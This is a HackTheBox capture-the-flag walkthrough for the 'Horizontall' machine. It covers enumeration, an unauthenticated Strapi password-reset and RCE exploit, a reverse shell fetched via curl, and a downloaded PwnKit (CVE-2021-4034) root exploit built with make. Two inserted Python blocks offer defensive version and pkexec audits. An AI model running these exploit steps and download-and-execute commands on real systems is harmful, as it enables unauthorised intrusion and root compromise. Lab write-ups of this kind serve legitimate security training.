Horizontall
About this machine: HTB
Operating system: Linux
Skills used:
Information Leakage
Port Forwarding
Strapi CMS Exploitation
Laravel Exploitation
Methodology:
We run the first scan against the target.
//
nmap -T3 -sS -n -v 10.10.11.105 -oN first_scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-27 20:05 EDT
Initiating Ping Scan at 20:05
Nmap scan report for 10.10.11.105
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.56 seconds
Raw packets sent: 1004 (44.152KB) | Rcvd: 1001 (40.048KB)
Service scan with default script execution:
❯ nmap -sC -sV -T3 -sS -n -p22,80 -v 10.10.11.105 -oN SC_scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-27 20:07 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:07
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:ff:6b:0d:d5 (RSA)
| 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
|_http-server-header: nginx/1.14.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We check what is running on port 80. The http-title shows a redirect to http://horizontall.htb, so we add that hostname to /etc/hosts.
//
nvim /etc/hosts

We brute-force virtual hosts with gobuster to enumerate subdomains.
//
❯ gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://horizontall.htb/ -z -t 200
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url: http://horizontall.htb/
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: false
Starting gobuster in VHOST enumeration mode
===============================================================
found: api-prod.horizontall.htb

We enumerate directories on the subdomain we found, again using gobuster.
//
❯ gobuster dir -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://api-prod.horizontall.htb -t 50 -z
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url: http://api-prod.horizontall.htb
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
Starting gobuster in directory enumeration mode
/admin (Status: 200) [Size: 854]
/users (Status: 403) [Size: 60]
/reviews (Status: 200) [Size: 507]
We browse the paths found; in /reviews we find an interesting JSON response.

Now we use searchsploit to look for a known vulnerability in Strapi.
//
searchsploit strapi
Exploit Title | Path
Strapi 3.0.0-beta - Set Password (Unauthenticated) | multiple/webapps/50237.py
Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated) | multiple/webapps/50238.py
Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated) | multiple/webapps/50239.py
Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit) | nodejs/webapps/50716.rb
We save the exploit we like best, in this case 50239, rename it and run it.
//
searchsploit -m multiple/webapps/50239.py
❯ python3 strapy.explout.py
[-] Wrong number of arguments provided
[*] Usage: python3 exploit.py
❯ python3 strapy.explout.py http://api-prod.horizontall.htb
[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit
[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNzQ1ODAyOTUwLCJleHAiOjE3NDgzOTQ5NTB9.DJvjPjeiRDNxOatzY6tWiJTxhjKp-60AWINFYtHGBRk
We check the credentials and LOG IN SUCCESSFULLY.
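The exploit above decides whether to proceed from the Strapi version it reads back. As an added defensive check (not part of this write-up or of the exploit scripts), here is a comparator for Strapi 3 pre-release version strings that flags an instance against the ceilings printed in the searchsploit titles above, so an inventory can be triaged without running anything against the hosts. The hostnames and versions in the sample inventory are constructed; the assumption is that the version in each exploit title is the last affected one.

```python
import re
from typing import List, Tuple

# Highest affected versions as given by the searchsploit titles in this
# write-up (assumption: the title's version is the last affected release).
VULN_CEILINGS = {
    "unauthenticated password reset / RCE chain (EDB 50239, 50716)": "3.0.0-beta.17.4",
    "authenticated RCE (EDB 50238)": "3.0.0-beta.17.7",
}

# Matches "3.0.0", "3.0.0-beta", "3.0.0-beta.17" and "3.0.0-beta.17.4".
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-beta(?:\.(\d+)(?:\.(\d+))?)?)?$")

def parse_version(v: str) -> Tuple[int, int, int, int, int, int]:
    """Sort key for Strapi 3 version strings; any beta sorts below the release."""
    v = v.strip()
    m = _VERSION_RE.match(v)
    if not m:
        raise ValueError(f"unrecognised Strapi version: {v!r}")
    major, minor, patch, beta_a, beta_b = m.groups()
    is_release = 0 if "-beta" in v else 1
    return (int(major), int(minor), int(patch), is_release, int(beta_a or 0), int(beta_b or 0))

def affected(v: str) -> List[str]:
    """Names of the listed issues whose ceiling is at or above this version."""
    key = parse_version(v)
    return [name for name, ceiling in VULN_CEILINGS.items() if key <= parse_version(ceiling)]

# Constructed sample inventory (hostnames and versions are made up).
SAMPLE_INVENTORY = {
    "api-prod.example.test": "3.0.0-beta.17.4",
    "api-staging.example.test": "3.0.0-beta.17.7",
    "api-dev.example.test": "3.0.0-beta.18.0",
    "api-next.example.test": "3.0.0",
}

def report(inventory) -> dict:
    return {host: affected(ver) for host, ver in inventory.items()}

if __name__ == "__main__":
    for host, issues in report(SAMPLE_INVENTORY).items():
        print(f"{host}: {', '.join(issues) or 'outside the listed ranges'}")
```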


We check whether we can run commands remotely from the exploit's terminal.
//
❯$> whoami
[+] Triggering Remote code executin
[*] Rember this is a blind RCE don't expect to see output
{"statusCode":400,"error":"Bad Request","message":[{"messages":[{"id":"An error occurred"}]}]}
It did not let us use nc, but we noticed that it does let us run curl, so we create an index.html and stand up a simple Python web server so that, when the victim machine fetches the index with curl and runs it, it sends us a reverse shell to our listener.

We look for the flag.
//
strapi@horizontall:~/myapi$ cd /home
strapi@horizontall:/home$ ls
developer
strapi@horizontall:/home$ cd developer
strapi@horizontall:/home/developer$ ls
composer-setup.php
myproject
user.txt
strapi@horizontall:/home/developer$ cat user.txt
a7493a7702747ee7f8b4300f17a9a1fa
We have the first flag and now look to escalate privileges.
We look for privilege-escalation options and find the following:
//
strapi@horizontall:/home/developer$ which pkexec
/usr/bin/pkexec
It has pkexec and the make command, which will let us use an already known CVE.
We go into the temporary directory:
strapi@horizontall:/home/developer$ cd /tmp/
We clone the CVE on our own machine (not the victim) to exploit the vulnerability:
git clone https://github.com/berdav/CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56 (from 1)
Receiving objects: 100% (92/92), 22.71 KiB | 394.00 KiB/s, done.
Resolving deltas: 100% (44/44), done.
We compress the exploit to send it to the victim machine:
zip -r comprimido.zip CVE-2021-4034/
Once it is compressed we start the Python web server again; from the victim machine we fetch it with wget, unzip the CVE, run make and run the exploit.

//
strapi@horizontall:~/myapi$ wget http://10.10.14.7/comprimido.zip
--2025-04-28 02:38:09-- http://10.10.14.7/comprimido.zip
Connecting to 10.10.14.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 52950 (52K) [application/zip]
Saving to: ‘comprimido.zip’
0K .......... .......... .......... .......... .......... 96% 161K 0s
50K . 100% 1.12M=0.3s
2025-04-28 02:38:09 (166 KB/s) - ‘comprimido.zip’ saved [52950/52950]
strapi@horizontall:~/myapi$ unzip comprimido.zip
strapi@horizontall:~/myapi$ cd CVE-2021-4034
strapi@horizontall:~/myapi/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.
strapi@horizontall:~/myapi/CVE-2021-4034$ ./cve-2021-4034
whoami
root
And we have gained root access; now we look for the last flag.
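From the defender's side, the precondition for this escalation is a setuid-root pkexec, and the make output above shows what the build leaves on disk (a directory literally named GCONV_PATH=. and a gconv-modules file next to it). As an added example, not part of this write-up or of the CVE-2021-4034 repository, here is a small audit that reports whether pkexec is still setuid-root and sweeps a directory tree for those build artifacts. The /usr/bin/pkexec path comes from the `which pkexec` output above; the artifact-name rule is a heuristic based on the make output shown, and the chmod 0755 stop-gap is the widely published mitigation.

```python
import os
import stat
from typing import Dict, Iterable, List

PKEXEC = "/usr/bin/pkexec"  # path shown by `which pkexec` in the write-up

def has_setuid_root(mode: int, uid: int) -> bool:
    """True when the mode carries the setuid bit and the owner is uid 0."""
    return bool(mode & stat.S_ISUID) and uid == 0

def audit_pkexec(path: str = PKEXEC) -> Dict[str, bool]:
    """Is pkexec present, and is it still setuid-root (the CVE-2021-4034 precondition)?"""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return {"present": False, "setuid_root": False}
    return {"present": True, "setuid_root": has_setuid_root(st.st_mode, st.st_uid)}

def advice(result: Dict[str, bool]) -> str:
    if not result["present"]:
        return "pkexec not installed: nothing to do"
    if result["setuid_root"]:
        return ("pkexec is setuid-root: update polkit; as a stop-gap, "
                "chmod 0755 /usr/bin/pkexec drops the setuid bit")
    return "pkexec present but not setuid-root: this escalation path is closed"

def gconv_artifacts(paths: Iterable[str]) -> List[str]:
    """Heuristic filter for what the make step above leaves behind: a directory
    named 'GCONV_PATH=.' and a 'gconv-modules' file outside /usr (where glibc keeps its own)."""
    hits = []
    for p in paths:
        name = os.path.basename(p.rstrip("/"))
        if name.startswith("GCONV_PATH=") or (
                name == "gconv-modules" and not p.startswith("/usr/")):
            hits.append(p)
    return hits

def scan_tree(root: str) -> List[str]:
    """Walk a tree (e.g. /tmp or /home) and return matching artifact paths."""
    found: List[str] = []
    for dirpath, dirnames, filenames in os.walk(root):
        found.extend(gconv_artifacts(os.path.join(dirpath, n) for n in dirnames + filenames))
    return found

if __name__ == "__main__":
    res = audit_pkexec()
    print(res, "->", advice(res))
    print("suspicious build artifacts under /tmp:", scan_tree("/tmp"))
```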
//
cd /root
ls
boot.sh
pid
restart.sh
root.txt
cat root.txt
86dc856f7d9e662dced3806d29391a9d
And that concludes this machine.